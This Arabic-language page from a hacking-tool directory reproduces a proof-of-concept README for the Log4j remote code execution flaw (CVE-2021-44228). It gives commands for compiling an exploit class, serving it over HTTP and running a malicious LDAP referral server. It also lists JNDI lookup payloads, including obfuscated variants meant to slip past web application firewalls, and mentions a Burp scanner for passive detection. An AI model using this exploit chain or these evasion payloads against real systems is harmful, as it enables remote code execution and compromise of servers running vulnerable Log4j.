Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4J_0day_RCE — Log4j-RCE (CVE-2021-44228) إثبات المفهوم | Kitploit
أدوات/GitHubGitHub/wysiiwyg/log4j_0day_rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراق
GitHubwysiiwyg/log4j_0day_rce

Log4J_0day_RCE

Log4j-RCE (CVE-2021-44228) إثبات المفهوم

عرض المستودع
15منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

انضم إلى المجتمع

تيليغرام

CVE-2021-44228(Apache Log4j تنفيذ التعليمات البرمجية عن بُعد)

الإصدارات المتأثرة < 2.15.0

الاستخدام:

root@kitploit:~
git clone https://github.com/PwnC00re/CVE-2021-44228-Apache-Log4j-Rce.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
python -m SimpleHTTPServer 8888 
root@kitploit:~
cd tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

قم بتشغيل المشروع أخيرًا، وسترى الآلة الحاسبة الخاصة بك محليًا.

نصائح:

يمكنك استخدام JNDI-Injection-Exploit للاستغلال.

تجاوز rc1

على سبيل المثال:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

تجاوز WAF

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

تفاصيل الثغرة

توفر عمليات البحث طريقة لإضافة قيم إلى تكوين Log4j في أماكن عشوائية.

Lookups

الطرق التي تسبب تسربًا في النهاية

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()

طريقة فحص بسيطة

إذا كنت ترغب في إجراء اختبار الصندوق الأسود، أقترح عليك القيام بالمسح السلبي.

BurpLog4jScan

استمتع!!! BurpLog4jScan.png

عدد النجوم عبر الزمن

النجوم عبر الزمن

تنزيل الأداة